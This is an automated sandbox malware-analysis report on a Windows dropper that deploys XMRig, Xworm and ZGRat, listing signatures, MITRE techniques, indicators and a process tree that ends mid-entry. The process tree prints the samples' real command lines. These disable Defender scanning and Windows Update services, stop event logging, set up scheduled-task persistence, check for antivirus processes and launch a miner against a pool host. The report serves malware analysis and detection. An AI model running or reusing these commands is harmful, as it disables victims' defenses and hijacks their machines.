xmrig | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

16-02-2024 02:54

240216-dd14ysfc71 10

16-02-2024 01:10

09-02-2024 16:00

09-02-2024 13:49

06-02-2024 16:58

06-02-2024 00:32

Analysis

max time kernel
17s
max time network
1800s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
16-02-2024 02:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.bin.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

xmrig xworm zgrat evasion miner persistence rat trojan upx

Malware Config

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Windows\System32\Bypass.exe	family_xworm

Detect ZGRat V1 36 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2540-74-0x0000000004A80000-0x0000000004C88000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-75-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-76-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-78-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-80-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-82-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-84-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-88-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-86-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-90-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-92-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-94-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-98-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-96-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-100-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-102-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-104-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-106-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-108-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-110-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-112-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-114-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-120-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-122-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-118-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-124-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-126-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-128-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-139-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-143-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-146-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/2540-130-0x0000000004A80000-0x0000000004C83000-memory.dmp	family_zgrat_v1
behavioral1/memory/592-1709-0x0000000004780000-0x00000000047C0000-memory.dmp	family_zgrat_v1
behavioral1/memory/1500-2028-0x0000000004BE0000-0x0000000004D0A000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	family_zgrat_v1
C:\Program Files (x86)\Adobe\Reader 9.0\Esl\InstallSetup7.exe	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3732	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	988	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2772	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3688	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4008	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	448	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2840	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3792	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3508	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1432	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3584	1732	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	1732	schtasks.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe	xmrig

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/592-1520-0x00000000045A0000-0x00000000045F4000-memory.dmp	net_reactor
behavioral1/memory/592-1546-0x00000000046F0000-0x0000000004742000-memory.dmp	net_reactor

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\skin.dll	acprotect

Executes dropped EXE 3 IoCs

Processes:

asdfg.exeghjk.exekb%5Efr_ouverture.exe

pid process

2540 asdfg.exe
1108 ghjk.exe
1644 kb%5Efr_ouverture.exe

pid	process
2540	asdfg.exe
1108	ghjk.exe
1644	kb%5Efr_ouverture.exe

Loads dropped DLL 4 IoCs

Processes:

4363463463464363463463463.bin.exe

pid	process
2216	4363463463464363463463463.bin.exe
2216	4363463463464363463463463.bin.exe
2216	4363463463464363463463463.bin.exe
2216	4363463463464363463463463.bin.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\skin.dll	upx
behavioral1/memory/1996-2005-0x0000000010000000-0x00000000100BB000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe	upx

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 141.98.234.31
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

description	ioc
Destination IP	141.98.234.31

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

Processes:

flow	ioc
837	raw.githubusercontent.com
40	raw.githubusercontent.com
174	raw.githubusercontent.com
306	raw.githubusercontent.com
390	raw.githubusercontent.com
566	bitbucket.org
39	raw.githubusercontent.com
99	pastebin.com
100	pastebin.com
575	bitbucket.org
839	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

92 ip-api.com

flow	ioc
92	ip-api.com

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe	autoit_exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2712	sc.exe
2564	sc.exe
1632	sc.exe
2436	sc.exe
1480	sc.exe
2696	sc.exe
1164	sc.exe
2224	sc.exe
2208	sc.exe
860	sc.exe
2064	sc.exe
1164	sc.exe
1720	sc.exe
2996	sc.exe
2480	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1812	1644	WerFault.exe	kb%5Efr_ouverture.exe
380	1428	WerFault.exe	lumma.exe
2408	592	WerFault.exe	daissss.exe
2604	2184	WerFault.exe	tidex_-_short_stuff.exe
1484	2688	WerFault.exe	WatchDog.exe
3316	3156	WerFault.exe	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
5792	5712	WerFault.exe	LM.exe

Creates scheduled task(s) 1 TTPs 24 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2996	schtasks.exe
1884	schtasks.exe
2424	schtasks.exe
3732	schtasks.exe
988	schtasks.exe
2772	schtasks.exe
2576	schtasks.exe
4008	schtasks.exe
3584	schtasks.exe
2388	schtasks.exe
2248	schtasks.exe
3688	schtasks.exe
3792	schtasks.exe
3508	schtasks.exe
4780	schtasks.exe
2880	schtasks.exe
328	schtasks.exe
788	schtasks.exe
448	schtasks.exe
1432	schtasks.exe
3016	schtasks.exe
2424	schtasks.exe
3012	schtasks.exe
2840	schtasks.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1504 timeout.exe
2872 timeout.exe
856 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1908 tasklist.exe
2504 tasklist.exe
2696 tasklist.exe
3212 tasklist.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1144 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

2052 PING.EXE
3260 PING.EXE
3480 PING.EXE

pid	process
1504	timeout.exe
2872	timeout.exe
856	timeout.exe

pid	process
1908	tasklist.exe
2504	tasklist.exe
2696	tasklist.exe
3212	tasklist.exe

pid	process
1144	taskkill.exe

pid	process
2052	PING.EXE
3260	PING.EXE
3480	PING.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

4363463463464363463463463.bin.exeasdfg.exeghjk.exe

description	pid	process
Token: SeDebugPrivilege	2216	4363463463464363463463463.bin.exe
Token: SeDebugPrivilege	2540	asdfg.exe
Token: SeDebugPrivilege	1108	ghjk.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

4363463463464363463463463.bin.exe

description	pid	process	target process
PID 2216 wrote to memory of 2540	2216	4363463463464363463463463.bin.exe	asdfg.exe
PID 2216 wrote to memory of 2540	2216	4363463463464363463463463.bin.exe	asdfg.exe
PID 2216 wrote to memory of 2540	2216	4363463463464363463463463.bin.exe	asdfg.exe
PID 2216 wrote to memory of 2540	2216	4363463463464363463463463.bin.exe	asdfg.exe
PID 2216 wrote to memory of 1108	2216	4363463463464363463463463.bin.exe	ghjk.exe
PID 2216 wrote to memory of 1108	2216	4363463463464363463463463.bin.exe	ghjk.exe
PID 2216 wrote to memory of 1108	2216	4363463463464363463463463.bin.exe	ghjk.exe
PID 2216 wrote to memory of 1108	2216	4363463463464363463463463.bin.exe	ghjk.exe
PID 2216 wrote to memory of 1644	2216	4363463463464363463463463.bin.exe	kb%5Efr_ouverture.exe
PID 2216 wrote to memory of 1644	2216	4363463463464363463463463.bin.exe	kb%5Efr_ouverture.exe
PID 2216 wrote to memory of 1644	2216	4363463463464363463463463.bin.exe	kb%5Efr_ouverture.exe
PID 2216 wrote to memory of 1644	2216	4363463463464363463463463.bin.exe	kb%5Efr_ouverture.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- - C:\Users\Admin\AppData\Local\Temp\BBLb.exe
    "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
    3⤵
    PID:1500
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:2212
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"
  2⤵
  - Executes dropped EXE
  PID:1644
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 460
    3⤵
    - Program crash
    PID:1812
- C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe"
  2⤵
  PID:2904
- C:\Users\Admin\AppData\Local\Temp\Files\update.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
  2⤵
  PID:3008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
    3⤵
    PID:2268
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "WindowsSecurity" /SC ONLOGON /TR "C:\ProgramData\WindowsSecurity.exe" /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:2424
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDAC5.tmp.bat""
    3⤵
    PID:2264
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1504
- - C:\Users\Public\svchost.exe
    "C:\Users\Public\svchost.exe"
    3⤵
    PID:2356
- - C:\ProgramData\WindowsSecurity.exe
    "C:\ProgramData\WindowsSecurity.exe"
    3⤵
    PID:2316
- C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe"
  2⤵
  PID:1904
- - C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\lumma.exe"
    3⤵
    PID:1428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 92
      4⤵
      Program crash
      PID:380
- C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe"
  2⤵
  PID:2184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 460
    3⤵
    - Program crash
    PID:2604
- C:\Users\Admin\AppData\Local\Temp\Files\daissss.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\daissss.exe"
  2⤵
  PID:592
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 592 -s 596
    3⤵
    - Program crash
    PID:2408
- C:\Users\Admin\AppData\Local\Temp\Files\NancyMfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NancyMfg.exe"
  2⤵
  PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Blowjob Blowjob.bat & Blowjob.bat & exit
    3⤵
    PID:2984
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:1184
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1908
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:1872
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2504
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Businesses + Flux + Protest + Hawaii + Vp + Insights 10568\Www.pif
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Congressional + Seems + Racks + Packed + Taiwan + Therefore 10568\W
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 10568
      4⤵
      PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\10568\Www.pif
      10568\Www.pif 10568\W
      4⤵
      PID:268
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "LynxGuard" /tr "wscript 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\LynxGuard.js'" /sc onlogon /F /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:2880
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\10568\Www.pif
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\10568\Www.pif
        5⤵
        
        PID:2128
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 15 localhost
      4⤵
      Runs ping.exe
      PID:2052
- C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe"
  2⤵
  PID:968
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2380
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1840
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1164
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2224
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2064
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2996
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2480
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WSNKISKT"
    3⤵
    - Launches sc.exe
    PID:2712
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:336
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:1332
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:2728
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:2956
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2564
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WSNKISKT"
    3⤵
    - Launches sc.exe
    PID:1632
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1164
- C:\Users\Admin\AppData\Local\Temp\Files\rty37.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty37.exe"
  2⤵
  PID:796
- C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe"
  2⤵
  PID:1996
- C:\Users\Admin\AppData\Local\Temp\Files\june.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
  2⤵
  PID:2320
- - C:\Users\Admin\AppData\Local\Temp\is-J7DV1.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-J7DV1.tmp\june.tmp" /SL5="$1027E,5927631,54272,C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
    3⤵
    PID:2400
- C:\Users\Admin\AppData\Local\Temp\Files\r.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
  2⤵
  PID:780
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 820
    3⤵
    - Program crash
    PID:1484
- C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe"
  2⤵
  PID:1084
- - C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe"
    3⤵
    PID:848
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  PID:1728
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:2624
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp6FC3.tmp.bat""
    3⤵
    PID:2072
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2872
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:1828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:2288
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:328
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:2956
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe"
  2⤵
  PID:1768
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:1884
- - C:\Windows\SysWOW64\SubDir\asg.exe
    "C:\Windows\SysWOW64\SubDir\asg.exe"
    3⤵
    PID:2704
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:788
- C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"
  2⤵
  PID:2572
- - C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"
    3⤵
    PID:584
- C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"
  2⤵
  PID:1136
- C:\Users\Admin\AppData\Local\Temp\Files\goldman1234.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\goldman1234.exe"
  2⤵
  PID:240
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2528
- C:\Users\Admin\AppData\Local\Temp\Files\rty29.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty29.exe"
  2⤵
  PID:2876
- C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
  2⤵
  PID:856
- C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"
  2⤵
  PID:2388
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
    3⤵
    PID:2728
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      PID:240
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:1104
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:2820
      - C:\Windows\SysWOW64\schtasks.exe
        
